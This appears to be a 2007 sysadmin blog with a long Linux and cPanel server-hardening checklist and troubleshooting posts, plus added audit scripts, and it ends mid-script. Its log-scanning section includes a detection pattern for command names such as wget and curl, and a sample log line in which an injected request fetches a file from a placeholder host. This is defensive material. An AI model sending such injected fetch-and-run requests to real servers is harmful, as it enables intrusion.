Monday, December 24, 2007

100 tweaks to secure your server to prevent HACK attempt

How to Secure your Linux Server:

1. Kernel recompile with grsecurity

2. firewall = CSF

3. Stop unnecessary processes

4. Install Logcheck

5. Install Logwatch

You can optimize host.conf and sysctl.conf:
http://www.eth0.us/node/104

To modify Logwatch, SSH into the server and log in as root.

At command prompt type:

nano -w /etc/log.d/conf/logwatch.conf

You will see this entry:

MailTo = root

and change to

MailTo = your@email.com

Note: Set the e-mail address to an offsite account in case you get hacked.

Detail = Low

Change that to Medium, or High...

Detail = 5 or Detail = 10

Note: High will give you more detailed logs with all actions. Save and exit.

6. If cpanel server then WHM configuration check

7. OpenSSH configuration check

8. Switch from proftpd to pure-ftpd (pure-ftpd is recommended as the more secure of the two)

9. Rootkit Hunter

rkhunter:

1. Log in to your server via SSH as root. Then type:

[root@server ~]# cd /usr/local/src/

Download RKHunter version 1.1.4:

[root@server ~]# wget http://downloads.rootkit.nl/rkhunter-1.1.4.tar.gz

Extract the files and run the installer:

[root@server ~]# tar -xzvf rkhunter-1.1.4.tar.gz

[root@server ~]# cd rkhunter

[root@server ~]# ./installer.sh

2. Now set up RKHunter to e-mail you daily scan reports:

[root@server ~]# nano -w /etc/cron.daily/rkhunter.sh

Add the following:

#!/bin/bash

(/usr/local/bin/rkhunter -c --cronjob 2>&1 | mail -s "RKhunter Scan Details" replace-this@with-your-email.com)

Replace the e-mail above with your e-mail. It is best to send the e-mail to an off-site address, so that if the box IS compromised the hacker can't erase the scan report unless he hacks another server too.

# chmod +x /etc/cron.daily/rkhunter.sh

10. Chkrootkit

Installing chkrootkit

[root@server ~]# wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
[root@server ~]# tar xvfz chkrootkit.tar.gz
[root@server ~]# ./chkrootkit*/chkrootkit

11. mod_security

12. mod_evasive

13. Host spoof protection

14. Operating System check

15. Name server configuration check

16. Disk check

17. Kernel check

18. Apache tune and check

19. MySQL tune and check

20. Enhanced log rotation

21. Day of the week backup rotations

22. Secure /tmp /var/tmp /dev/shm

23. Libsafe for 2.4 kernels

24. Exploit check

25. Delete unnecessary OS users

26. Disable open DNS recursion

27. Enhanced path protection

28. Remove SUID/GUID from binaries

29. PHP hardening

30. phpsuexec

31. Disable vulnerable phpBB installs

32. Initial cPanel configuration

33. Check iptables is configured

34. Check incoming MySQL port

35. Check /etc/cron.daily/logrotate

36. Check /etc/resolv.conf for localhost entry

37. Check /etc/named.conf for recursion restrictions

38. Check server runlevel

39. Check nobody cron

40. Check Operating System support

41. Check SSHv1 is disabled

42. Check SSH on non-standard port

43. Check SSH PasswordAuthentication

44. Check telnet port 23 is not in use

45. Check shell limits

46. Check Background Process Killer

47. Check root forwarder

48. Check exim for extended logging

49. Check php for enable_dl = Off

50. Check php for disable_functions (allow_url_fopen is an ini directive, not a function, so it goes on its own line):

disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open

allow_url_fopen = Off


51. Check php for register_globals = Off

52. Check php open_basedir protection
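Added example, not from the original post and not cPanel's or PHP's own tooling: a shell script that checks items 49 to 52 against a php.ini. The sample php.ini and the list of command-execution functions it looks for are constructed here; set PHP_INI to a real file to audit a server.

```shell
#!/bin/sh
# Added example: audit the php.ini directives from items 49-52.
# Not part of the original post; the sample php.ini below is constructed.

# Value of a php.ini directive. The last uncommented "key = value" line wins,
# which is how PHP treats a directive that appears more than once.
php_ini_get() {
    # $1 = php.ini path, $2 = directive name
    awk -v key="$2" '
        /^[ \t]*;/ { next }                  # ";" starts a comment
        index($0, "=") == 0 { next }         # not an assignment
        {
            k = substr($0, 1, index($0, "=") - 1)
            v = substr($0, index($0, "=") + 1)
            gsub(/^[ \t]+|[ \t]+$/, "", k)
            gsub(/^[ \t]+|[ \t]+$/, "", v)
            if (k == key) val = v
        }
        END { print val }' "$1"
}

# Compare one directive with its hardened value (case-insensitive).
# Prints an OK or FAIL line; returns 1 on a mismatch.
php_ini_check() {
    # $1 = php.ini path, $2 = directive, $3 = expected value
    actual=$(php_ini_get "$1" "$2")
    if [ "$(printf '%s' "$actual" | tr 'A-Z' 'a-z')" = "$(printf '%s' "$3" | tr 'A-Z' 'a-z')" ]; then
        printf 'OK   %s = %s\n' "$2" "$actual"
        return 0
    fi
    printf 'FAIL %s = "%s" (expected %s)\n' "$2" "$actual" "$3"
    return 1
}

# Print every function from the argument list that disable_functions lacks.
php_ini_missing_disabled() {
    # $1 = php.ini path; remaining arguments = functions that must be disabled
    ini=$1; shift
    have=$(php_ini_get "$ini" disable_functions | tr -d ' \t' | tr ',' '\n')
    for fn in "$@"; do
        printf '%s\n' "$have" | grep -qx "$fn" || printf '%s\n' "$fn"
    done
}

# Run the checks for items 49-52; the return value is the number of failures.
php_ini_audit() {
    fails=0
    php_ini_check "$1" enable_dl Off || fails=$((fails + 1))
    php_ini_check "$1" register_globals Off || fails=$((fails + 1))
    # open_basedir only confines scripts when it is set to something
    if [ -z "$(php_ini_get "$1" open_basedir)" ]; then
        echo 'FAIL open_basedir is empty'
        fails=$((fails + 1))
    else
        printf 'OK   open_basedir = %s\n' "$(php_ini_get "$1" open_basedir)"
    fi
    missing=$(php_ini_missing_disabled "$1" system shell_exec passthru exec popen proc_open)
    if [ -n "$missing" ]; then
        echo "FAIL disable_functions lacks: $(printf '%s' "$missing" | tr '\n' ' ')"
        fails=$((fails + 1))
    else
        echo 'OK   disable_functions covers the command-execution functions'
    fi
    return $fails
}

# Constructed sample with weak settings so a stand-alone run shows failures;
# point PHP_INI at a real php.ini to audit a server.
SAMPLE_INI=$(mktemp)
trap 'rm -f "$SAMPLE_INI"' EXIT
cat > "$SAMPLE_INI" <<'EOF'
; constructed sample php.ini, not from a real server
enable_dl = On
register_globals = On
open_basedir =
disable_functions = show_source, phpinfo
EOF
php_ini_audit "${PHP_INI:-$SAMPLE_INI}" || echo "$? check(s) failed"
```

Run it with PHP_INI=/usr/local/lib/php.ini (or wherever php -i reports the loaded file) to audit the real configuration; the constructed sample is only there so the script has something to report on.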

53. Check phpsuexec

54. Check cPanel login is SSL only

55. Check boxtrapper is disabled

56. Check max emails per hour is set

57. Check whether users can reset passwords via email

58. Check whether native cPanel SSL is enabled

59. Check compilers

60. Check Anonymous FTP access

61. Check allow remote domains

62. Check block common domains

63. Check allow park domains

64. Check package updates

65. Check security updates

66. Check melange chat server

67. service cups stop; chkconfig cups off

68. service xfs stop; chkconfig xfs off

69. service atd stop; chkconfig atd off

70. service nfslock stop; chkconfig nfslock off

71. service canna stop; chkconfig canna off

72. service FreeWnn stop; chkconfig FreeWnn off

73. service cups-config-daemon stop; chkconfig cups-config-daemon off

74. service iiim stop; chkconfig iiim off

75. service mDNSResponder stop; chkconfig mDNSResponder off

76. service nifd stop; chkconfig nifd off

77. service rpcidmapd stop; chkconfig rpcidmapd off

78. service bluetooth stop; chkconfig bluetooth off

79. service anacron stop; chkconfig anacron off

80. service gpm stop; chkconfig gpm off

81. service saslauthd stop; chkconfig saslauthd off

82. service avahi-daemon stop; chkconfig avahi-daemon off

83. service avahi-dnsconfd stop; chkconfig avahi-dnsconfd off

84. service hidd stop; chkconfig hidd off

85. service pcscd stop; chkconfig pcscd off

86. service sbadm stop; chkconfig sbadm off

87. service webmin stop; chkconfig webmin off

88. Add a load alert script run from cron every minute

#!/bin/bash
# uptime alert script: mail the uptime line when the 1-minute load average exceeds 4
# ($(NF-2) is the 1-minute figure; cut drops the decimals and the trailing comma)
UP=`uptime | awk '{print $(NF-2)}' | cut -d. -f1`
if test "$UP" -gt 4
then
    uptime | mail -s "**SERVER LOAD is $UP" mailadd@mail.com
fi

89. Ignore ping:

[root@server ~]# iptables -A INPUT -p icmp -j DROP

[root@server ~]# echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all

(Mind the space after the 1: `echo 1>/proc/...` is parsed as a redirection and writes an empty line instead of a 1.)

[root@server ~]# vi /etc/sysctl.conf

Append the following line so the setting survives a reboot:

net.ipv4.icmp_echo_ignore_all = 1

90. Find directory with 777 permission.

[root@server ~] find . -type d -perm 777
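Added example for items 28 and 90, not from the original post: find commands that cover every world-writable directory and every set-id file, wrapped in functions and tried on a constructed directory tree so nothing on the real system is touched. The baseline-file comparison and the demo tree are assumptions of the example.

```shell
#!/bin/sh
# Added example for items 28 and 90; not from the original post.

# World-writable directories below $1 that lack the sticky bit. The post's
# "find . -type d -perm 777" matches only the exact mode 0777; "-perm -0002"
# catches every world-writable mode, and "! -perm -1000" skips /tmp-style
# directories (mode 1777) where the sticky bit stops users deleting each
# other's files. -xdev keeps the scan on one filesystem (no /proc, no NFS).
find_world_writable_dirs() {
    find "$1" -xdev -type d -perm -0002 ! -perm -1000
}

# Setuid or setgid files below $1. Stripping the bits blindly breaks tools
# such as passwd and su, so compare against a baseline taken on a clean
# install and review only what is new.
find_setid_files() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \)
}

# Set-id files that are not listed in the baseline file $2 (one path per line).
setid_not_in_baseline() {
    find_setid_files "$1" | grep -vxF -f "$2"
}

# Constructed tree: one 0777 directory, one 1777 directory, one plain one,
# one setuid file and one plain file. Prints the tree's path.
make_demo_tree() {
    t=$(mktemp -d)
    mkdir "$t/open" "$t/tmpish" "$t/normal"
    chmod 777 "$t/open"
    chmod 1777 "$t/tmpish"
    chmod 755 "$t/normal"
    : > "$t/normal/suid-tool"; chmod 4755 "$t/normal/suid-tool"
    : > "$t/normal/plain";     chmod 755 "$t/normal/plain"
    printf '%s\n' "$t"
}

# Stand-alone demo on the constructed tree; on a server run the two
# functions against / instead and keep find_setid_files output as a baseline.
T=$(make_demo_tree)
echo "world-writable directories without the sticky bit:"
find_world_writable_dirs "$T"
echo "set-id files:"
find_setid_files "$T"
rm -rf "$T"
```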

91. Check for open ports using the nmap command.

92. Disable identification output for Apache

To disable the version output for Apache, SSH into the server and log in as root.

At the command prompt type: pico /etc/httpd/conf/httpd.conf

Scroll (way) down and change the following line to

ServerSignature Off

Restart Apache. At the command prompt type:

[root@server ~]# /etc/rc.d/init.d/httpd restart

93. Change the ssh ListenAddress in /etc/ssh/sshd_config

94. Set PermitRootLogin no in /etc/ssh/sshd_config
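Added example for items 41 to 43, 93 and 94, not from the original post: a script that reads the effective sshd_config values the way sshd does (first match wins, keywords are case-insensitive, anything under a Match block is conditional) and reports the settings that do not meet those items. The two sample configs, the address 192.0.2.10 and the SSHD_CONFIG variable are constructed for the example.

```shell
#!/bin/sh
# Added example for items 41-43, 93 and 94; not from the original post.

# Effective value of a keyword. sshd uses the FIRST uncommented occurrence,
# keywords are case-insensitive, and everything after a "Match" line only
# applies conditionally, so reading stops there.
sshd_get() {
    # $1 = keyword, $2 = path to sshd_config
    awk -v key="$(printf '%s' "$1" | tr 'A-Z' 'a-z')" '
        /^[ \t]*#/ || /^[ \t]*$/ { next }
        tolower($1) == "match"  { exit }
        tolower($1) == key      { sub(/^[ \t]*[^ \t]+[ \t]+/, ""); sub(/[ \t]+$/, ""); print; exit }
    ' "$2"
}

lower() { printf '%s' "$1" | tr 'A-Z' 'a-z'; }

# One line per finding; the return value is the number of findings.
# Unset keywords are judged by the OpenSSH defaults of this era
# (Port 22, PasswordAuthentication yes, PermitRootLogin yes).
sshd_audit() {
    cfg=$1; n=0
    proto=$(sshd_get Protocol "$cfg")
    case ",$proto," in
        ,,)    echo "FAIL Protocol not set; set 'Protocol 2' so SSHv1 cannot be negotiated (item 41)"; n=$((n + 1)) ;;
        *,1,*) echo "FAIL Protocol $proto still allows SSHv1 (item 41)"; n=$((n + 1)) ;;
    esac
    port=$(sshd_get Port "$cfg")
    if [ "${port:-22}" = 22 ]; then
        echo "FAIL sshd listens on the default port 22 (item 42)"; n=$((n + 1))
    fi
    if [ "$(lower "$(sshd_get PasswordAuthentication "$cfg")")" != no ]; then
        echo "FAIL PasswordAuthentication is not 'no' (item 43)"; n=$((n + 1))
    fi
    if [ "$(lower "$(sshd_get PermitRootLogin "$cfg")")" != no ]; then
        echo "FAIL PermitRootLogin is not 'no' (item 94)"; n=$((n + 1))
    fi
    if [ -z "$(sshd_get ListenAddress "$cfg")" ]; then
        echo "FAIL no ListenAddress, so sshd binds every interface (item 93)"; n=$((n + 1))
    fi
    [ "$n" -eq 0 ] && echo "OK $cfg meets items 41-43, 93 and 94"
    return $n
}

# Constructed samples: a file with the defaults left in place and a hardened one.
WEAK=$(mktemp); HARD=$(mktemp)
trap 'rm -f "$WEAK" "$HARD"' EXIT
cat > "$WEAK" <<'EOF'
# constructed sample sshd_config, defaults left in place
#Port 22
Protocol 2,1
#PermitRootLogin yes
#PasswordAuthentication yes
EOF
cat > "$HARD" <<'EOF'
# constructed sample sshd_config, hardened per items 41-43, 93 and 94
Port 2222
Protocol 2
ListenAddress 192.0.2.10
PermitRootLogin no
PasswordAuthentication no
Match User backupuser
    PasswordAuthentication yes
EOF
sshd_audit "$WEAK" || echo "$? finding(s) in the weak sample"
sshd_audit "$HARD"

# Audit the real file when it is readable (override the path with SSHD_CONFIG).
REAL=${SSHD_CONFIG:-/etc/ssh/sshd_config}
if [ -r "$REAL" ]; then
    sshd_audit "$REAL" || echo "$? finding(s) in $REAL"
fi
```

Restart sshd only after checking the new Port and ListenAddress from a second session, so a typo cannot lock you out of the box.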

95. Add a root login alert

vi .bash_profile

Add the following on one line (a line break before the | would be a syntax error):

echo 'ALERT - Root Shell Access on:' `date` `who` | mail -s "Alert: Root Access from `who | awk '{print $6}'`" your@email.com

96. Set an SSH legal message in /etc/motd

97. Use locate to look for files that commonly turn up after a compromise (IRC bots, BNCs, web shells, .rhosts):

locate shell.php
locate irc
locate eggdrop
locate bnc
locate BNC
locate ptlink
locate BitchX
locate guardservices
locate psyBNC
locate .rhosts

98. Run a UDP and TCP scan against the server from outside, for example at:

http://www.hackerwatch.org/probe

Also, to check whether your Internet connection has no reverse DNS, this is another good URL to check out:

https://www.grc.com/x/ne.dll?bh0bkyd2


99. Check the log files:

[root@server ~]# tail -f /var/log/secure
[root@server ~]# tail -f /var/log/messages
[root@server ~]# lastlog ( /var/log/lastlog is a binary database, so read it with the lastlog command rather than tail )
[root@server ~]# tail -f /var/log/security ( logs related to kernel and ICMP/TCP )

and the other log files (depending on your OS distro) of the services running, to see if there are any issues.

vmstat

Displays information about memory, CPU and disk.
Ex: bash# vmstat 1 4 (where 1 is delay and 4 is count)

mpstat

Displays statistics about CPU utilization. This will help you see whether your CPU is overworked.
Ex: bash# mpstat 1 4 (where 1 is delay and 4 is count)

iostat

This command displays statistics about the disk system.
Useful options:
-d - Gives the device utilization report.
-k - Display statistics in kilobytes per second.
Ex: bash# iostat -dk 1 4 (where 1 is delay and 4 is count)

sar

Displays overall system performance.

Check to see if your server has any hidden processes running.

ps

Displays the status of all known processes.
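Added example, not from the original post: one way to do the hidden-process check from the ps section above, comparing what the kernel exposes under /proc with what ps reports (a rootkit that patches ps or the libraries it uses hides the process from ps but usually not from /proc). The stand-alone run reads the live machine; the function that diffs the two lists takes two files so it can be tested on constructed lists.

```shell
#!/bin/sh
# Added example for the "hidden processes" check; not from the original post.

# PIDs the kernel exposes under /proc, one per line.
pids_from_proc() {
    for d in /proc/[0-9]*; do
        [ -d "$d" ] && printf '%s\n' "${d#/proc/}"
    done
}

# PIDs that the ps tool reports.
pids_from_ps() {
    ps -e -o pid= | tr -d ' '
}

# Lines of the list in file $1 that do not occur in file $2. Uses FILENAME
# rather than the usual NR==FNR idiom so that an empty $2 is handled too.
list_diff() {
    awk 'FILENAME == ARGV[1] { seen[$1] = 1; next } !($1 in seen)' "$2" "$1"
}

# Take both snapshots, diff them, then confirm each hit: a process that
# exited between the two snapshots is a race, not a hidden process.
check_hidden_processes() {
    p=$(mktemp); q=$(mktemp)
    pids_from_proc > "$p"
    pids_from_ps > "$q"
    list_diff "$p" "$q" | while read -r pid; do
        if [ -d "/proc/$pid" ] && ! ps -p "$pid" -o pid= >/dev/null 2>&1; then
            printf 'HIDDEN pid %s\n' "$pid"
        fi
    done
    rm -f "$p" "$q"
}

if [ -d /proc ] && command -v ps >/dev/null 2>&1; then
    hits=$(check_hidden_processes)
    if [ -n "$hits" ]; then printf '%s\n' "$hits"; else echo "no hidden processes found"; fi
fi
```

A hit only says that ps and /proc disagree; the next step is to look at /proc/PID/exe and /proc/PID/cmdline for that PID and to run chkrootkit or rkhunter (items 9 and 10), since a kernel-level rootkit can hide the /proc entry as well.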

100. lsof

Lists all open files. In Linux everything is considered a file, so you will be able to see almost all of the activity on your system with this command.

A few more things to do:

* [root@server ~]# chmod -R 700 /etc/rc.d/init.d/*
* Use rpm -Va to find out whether the files of any installed package have been modified
* Apply security patches to vulnerable software (i.e. patch -p1 < patchfile)
* Remove all unneeded ttys and console logins by removing their entries from /etc/securetty
* Check system logs (e.g. /var/log/messages, /var/log/secure, etc.)
* Set a password on the boot loader (lilo and grub both support this)
* Monitor the system (nagios or big brother)

Install AIDE (Advanced Intrusion Detection Environment), a free replacement for Tripwire:

http://www.cs.tut.fi/~rammer/aide.html

Testing phase when in production:

Use tools like nessus, nikto, and nmap to do a penetration test and see how well your server is secured.

Also do a stress test.

[root@server ~]# find /usr/local/apache/domlogs -exec egrep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)%20' {} \;

[root@server ~]# find /usr/local/apache/domlogs -exec grep -EiH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)%20' {} \;


Note: egrep works on FreeBSD; on other distros such as CentOS use grep -E, which is the same thing (plain grep without -E treats the parentheses and | literally, so it would match nothing).
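Added example, not from the original post: the same search over the access logs as a script, with the post's pattern anchored so that "cd%20" does not also fire on ordinary words ending in those letters, and a constructed log (documentation-range addresses) that shows what it catches and what it skips.

```shell
#!/bin/sh
# Added example for the domlogs search in the "Testing phase" section;
# not from the original post. The alternation is the post's own; the
# leading group is an addition that requires a non-word character before
# the command name, so "...;cd%20/tmp" is reported but "abcd%20efgh" is not.
SUSPECT_RE='(^|[^A-Za-z0-9_])(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)%20'

# Hits in one access log as file:line:text, with %20 decoded for readability.
scan_access_log() {
    grep -EiHn "$SUSPECT_RE" "$1" | sed 's/%20/ /g'
}

# The same over every file below a log directory (cPanel keeps one log per
# domain under /usr/local/apache/domlogs).
scan_domlogs() {
    find "$1" -type f -exec grep -EiHn "$SUSPECT_RE" {} + | sed 's/%20/ /g'
}

# Constructed sample log: an ordinary request, a fetch-and-run attempt in a
# query string, a harmless "abcd%20" that the bare pattern would flag, and
# a "cd" attempt. Addresses are from the documentation ranges.
SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
192.0.2.7 - - [24/Dec/2007:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.8 - - [24/Dec/2007:10:00:02 +0000] "GET /cgi-bin/test.cgi?x=;wget%20http://203.0.113.5/x.txt HTTP/1.0" 200 0 "-" "-"
192.0.2.9 - - [24/Dec/2007:10:00:03 +0000] "GET /search.php?q=abcd%20efgh HTTP/1.1" 200 100 "-" "Mozilla/5.0"
192.0.2.10 - - [24/Dec/2007:10:00:04 +0000] "GET /view.php?p=;cd%20/tmp HTTP/1.0" 200 0 "-" "-"
EOF

scan_access_log "$SAMPLE_LOG"
```

On a server, call scan_domlogs /usr/local/apache/domlogs and read the hits together with the response code: a 200 on a request like the second line means the script accepted the input and the account needs a closer look.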

Wednesday, October 31, 2007

frontpage extensions didn't work on freebsd 6.2

freebsd + easyapache = no frontpage extensions:

Issue: After recompiling Apache on FreeBSD 6.2, the FrontPage extensions didn't work.

Resolution:
The frontpage module runs some tests on the /usr/local/frontpage/version5.0/apache-fp/_vti_bin/fpexe file, and if any of them fail it doesn't include itself in the Apache build. The test it was failing on was whether it could write-protect that file.

Here is the possible Fix :

# vi /var/cpanel/perl/easy/Cpanel/Easy/Apache/Frontpage.pm

and replace the following line

return $self->run_system_cmd_returnable( [qw(chattr -i /usr/local/frontpage/version5.0/apache-fp/_vti_bin/fpexe)] );

with this one

return $self->run_system_cmd_returnable( [qw(chflags noschg /usr/local/frontpage/version5.0/apache-fp/_vti_bin/fpexe)] );

And replace this

return $self->run_system_cmd_returnable( [qw(chattr +i /usr/local/frontpage/version5.0/apache-fp/_vti_bin/fpexe)] );

with this one

return $self->run_system_cmd_returnable( [qw(chflags schg /usr/local/frontpage/version5.0/apache-fp/_vti_bin/fpexe)] );

save and exit the file.

Also write protect the file with

# chflags schg /var/cpanel/perl/easy/Cpanel/Easy/Apache/Frontpage.pm

# /scripts/easyapache --force


Note: on FreeBSD the chflags command takes the place of the chattr command used on Linux.

Sunday, October 7, 2007

Error while creating mbox spool file

Issue: "error while creating mbox spool file"
If exim and spamd both fail constantly on a cPanel server:

Resolution:

check the exim panic logs at

# tail -f /var/log/exim_paniclog

Also try out the following scripts :

# /scripts/eximup --force
# /scripts/perlinstaller --force Mail::SpamAssassin
# /scripts/autorepair spamd_dbm_fix
# /scripts/fixspamassassinfailedupdate


Also check the available disk space and available inodes on the partition holding /var

# df -h
# df -hi


If you are receiving the errors like

2007-09-12 12:50:00 1IVPnE-00085R-86 failed to open scan directory /var/spool/exim/scan/scan/1IVPnE-00085R-86: Too many links
2007-09-12 12:50:00 1IVPnE-00085R-86 spam acl condition: error while creating mbox spool file
2007-09-12 12:50:00 1IVPnE-00085R-86 failed to open scan directory /var/spool/exim/scan/scan/1IVPnE-00085R-86: Too many links

2007-10-06 17:01:41 1IeHiN-0005Nf-UI failed to open scan directory /var/spool/exim/scan/scan/1IeHiN-0005Nf-UI: Too many links
2007-10-06 17:01:41 1IeHiN-0005Nf-UI malware acl condition: error while creating mbox spool file
2007-10-06 17:01:41 1IeHiN-0005Nf-UI H=(<5) [] F=<> temporarily rejected after DATA
2007-10-06 17:01:41 1IeHiN-0005Ng-UO failed to open scan directory /var/spool/exim/scan/scan/1IeHiN-0005Ng-UO: Too many links


# cd /var/spool/exim/scan

# ls -alt | wc


If you've got a real high number (like 32000) then that might be a problem - for a few reasons -
(1) filesystem may only support x # of directories,
(2) something else going wrong causing too many directories to remain there even after processing.


The possible fix for this issue:

The following errors occurred because the scan directory crossed its size limit:

2007-10-06 05:05:50 1Ie6Xe-00042f-9B failed to open scan directory /var/spool/exim/scan/scan/1Ie6Xe-00042f-9B: Too many links
2007-10-06 05:05:50 1Ie6Xe-00042t-5y failed to open scan directory /var/spool/exim/scan/scan/1Ie6Xe-00042t-5y: Too many links


Solution:

Empty the folder /var/spool/exim/scan. You can empty a large folder with the following command (do not pipe ls -l into xargs: its permission, size and date fields would be passed to rm as file names):

# cd /var/spool/exim/scan && ls | xargs rm -rf
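Added example, not from the original post: the same cleanup with two safeguards, a count checked against a threshold and an age limit so that a scan exim is running at that moment is left alone. The demo directory, the threshold of 30000 and the 60-minute age are assumptions of the example.

```shell
#!/bin/sh
# Added example for the exim scan directory cleanup; not from the original post.

# Entries directly under the scan directory: the figure "ls -alt | wc" gives,
# minus the ".", ".." and "total" lines that command also counts.
scan_dir_count() {
    find "$1" -mindepth 1 -maxdepth 1 | grep -c .
}

# Compare the count with a threshold below the limit the post quotes
# (around 32000 subdirectories on ext3); returns 1 when it is reached.
scan_dir_check() {
    # $1 = scan dir, $2 = threshold
    n=$(scan_dir_count "$1")
    if [ "$n" -ge "$2" ]; then
        echo "WARN $1 holds $n entries (threshold $2)"
        return 1
    fi
    echo "OK $1 holds $n entries"
}

# Remove only subdirectories older than $2 minutes, so a scan that is in
# progress right now is not pulled out from under exim.
# -mindepth, -maxdepth and -mmin are GNU and BSD find options.
scan_dir_purge() {
    # $1 = scan dir, $2 = minimum age in minutes
    find "$1" -mindepth 1 -maxdepth 1 -type d -mmin +"$2" -exec rm -rf {} +
}

# Stand-alone demo on a constructed directory: two stale entries named after
# the message IDs in the log lines above, plus one fresh entry.
D=$(mktemp -d)
mkdir "$D/1Ie6Xe-00042f-9B" "$D/1Ie6Xe-00042t-5y" "$D/in-progress"
touch -t 200710060505 "$D/1Ie6Xe-00042f-9B" "$D/1Ie6Xe-00042t-5y"
scan_dir_check "$D" 3 || true
scan_dir_purge "$D" 60
scan_dir_check "$D" 3
rm -rf "$D"

# On a real server (cron it, or run it by hand when the panic log fills up):
#   scan_dir_check /var/spool/exim/scan 30000 || scan_dir_purge /var/spool/exim/scan 60
```

If the count climbs back quickly after a purge, the second cause the post mentions applies (entries are not being removed after processing) and the purge is only buying time until the spamd/clamd side is fixed.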

Friday, September 28, 2007

Blank screen after login for cpanel

Issue: Blank screen after login for cpanel

WHM works fine and we can make accounts, but when we go into List Accounts and click on the cPanel icon for a user, it goes to the login screen for the frontend and, after the password is put in, just loads a blank screen. The permissions for the folders are fine.


Resolution:

WHM > Tweak Settings > System section > remove the check beside:

Disable login with root or reseller password into the users' cPanel interface. Also disable switch account dropdown in themes with switch account feature.



...http://myip:2082

You will get the login for cpanelX. and you put in the correct login details and it logs into an empty screen.

If this is a new server, make sure you choose a theme under

Server Configuration >> Basic cPanel/WHM Setup >> Default cPanel Theme

* Enter the default cPanel theme for newly created accounts whose package does not specify a theme.

If that fails,

try running from root in ssh

# /scripts/portsup

then run

# /usr/local/cpanel/bin/checkperlmodules

after that finishes, run

# /scripts/upcp --force



check the log file at

# /usr/local/cpanel/logs/error_log


# /scripts/portsup


# portupgrade compat4x-i386-5.X (Assuming you are running FreeBSD i386 v5.3 or v5.4)


# /usr/local/cpanel/bin/checkperlmodules


# /scripts/upcp --force


In addition, login to the WHM >> Tweak Settings >> System section >> un-check the following: Disable login with root or reseller password into the users' cPanel interface. Also disable switch account dropdown in themes with switch account feature

You'll need to increase RLIMIT_RSS for cPanel to function properly. The following error is being generated:

The rlimit 'RLIMIT_RSS' is set below the maximum sane threshold for cPanel to function. Currently it is set at [soft:78643200 hard:78643200].
Please increase it to at least 134217728.

Installing roundcube webmail on Directadmin server

How to install roundcube on Linux server with Directadmin installed:

The following is the roundcube install script; it is released as a beta version.

To install it:

# cd /usr/local/directadmin/scripts

# wget -O roundcube.sh http://files.directadmin.com/services/all/roundcube.sh

# chmod 755 roundcube.sh

# ./roundcube.sh


Once installed, you'll need to restart Apache for the /roundcube alias to function. Roundcube uses MySQL for its data, so a da_roundcube database is created.


On CentOS 4.4+ and Debian 3.1+ the above script works as is, but if your server runs FreeBSD, the line

/bin/mv --force [files]

needs to be changed to

/bin/mv -f [files]

or it will fail with

mv: illegal option -- -

If no da_admin or root password was set for MySQL and you get permission errors about MySQL, try running the following:

# /usr/local/bin/mysqladmin -u root password 'new password'

# /usr/local/directadmin/scripts/mysql.sh 'root mysql password' da_admin 'da_admin password you want'


If you want to see errors - edit /var/www/html/roundcube/config/main.inc.php and set debug level to 4.


RoundCube webmail is a web-based mail client like squirrelmail or uebimiau. More info about RoundCube webmail: http://www.roundcube.net


Issue: IMAP not working; can't connect to port 143

Following are the quick fixes:

1) Make sure /usr/sbin/imapd exists and is executable. You should be able to run it and see:

[root@user sbin]# /usr/sbin/imapd
* OK [CAPABILITY IMAP4REV1 LOGIN-REFERRALS STARTTLS AUTH=LOGIN]
server.hostname.com IMAP4rev1 2003.339 at Thu, 23 Sept 2007 12:34:14 -0600 (MDT)

2) Make sure xinetd is running (inetd on FreeBSD):

[root@user sbin]# ps -ax | grep inetd | grep -v grep

On newer redhat/fedora/centos machines, you can install it with:

# yum -y install xinetd

# /sbin/service xinetd start

# /sbin/chkconfig xinetd on


3) Make sure xinetd has the proper settings:
RedHat: /etc/xinetd.d/imap

# default: on
# description: imapd
service imap
{
disable = no
socket_type = stream
wait = no
user = root
server = /usr/sbin/imapd
log_on_success += DURATION USERID
log_on_failure += USERID
nice = 10
}


FreeBSD: /etc/inetd.conf

imap4 stream tcp nowait root /usr/sbin/imapd imapd

Note that /etc/inetd.conf will contain many other lines. Just make sure that this one exists somewhere.

To test it out, run:

[root@user]# telnet localhost 143
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
* OK [CAPABILITY IMAP4REV1 LOGIN-REFERRALS STARTTLS AUTH=LOGIN]
localhost IMAP4rev1 2003.339 at Thu, 23 Sept 2007 12:39:55 -0600 (MDT)

4) You can also double check that the imapd binary is the one we included by running:

# rm -f /usr/sbin/imapd

# cd /usr/local/directadmin/scripts

# ./imapd.sh


5) check your /etc/hosts file. Make sure you have one line that contains

127.0.0.1 localhost.localdomain localhost

6) If you can connect via localhost and not from outside the server, check your firewall settings to make sure port 143 is open.

# netstat --listen
# lsof -i

And if nmap is installed on server then you can check by using command

# nmap localhost

If port 143 shows as open in that listing, the port is open on the server.
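Added example, not from the original post: steps 1, 3 and 5 above as checks that run against a given xinetd service file and hosts file, tried on constructed samples first (with /bin/sh standing in for /usr/sbin/imapd so the executable test passes on any box).

```shell
#!/bin/sh
# Added example for the IMAP troubleshooting steps; not from the original post.

# Value of an attribute inside "service NAME { ... }" in an xinetd file.
# Only "attr = value" lines are read; "+=" lists are not needed here.
xinetd_attr() {
    # $1 = xinetd file, $2 = service name, $3 = attribute
    awk -v svc="$2" -v attr="$3" '
        /^[ \t]*#/ { next }
        $1 == "service" { cur = $2; next }
        cur == svc && $1 == attr && $2 == "=" { print $3; exit }
    ' "$1"
}

# Steps 1 and 3: the imap stanza must be enabled and point at a server
# binary that exists and is executable. Returns the number of findings.
imap_xinetd_check() {
    # $1 = xinetd service file (RedHat: /etc/xinetd.d/imap)
    n=0
    if [ "$(xinetd_attr "$1" imap disable)" != no ]; then
        echo "FAIL imap service is not enabled (needs 'disable = no')"; n=$((n + 1))
    fi
    srv=$(xinetd_attr "$1" imap server)
    if [ -z "$srv" ]; then
        echo "FAIL no 'server =' line in the imap stanza"; n=$((n + 1))
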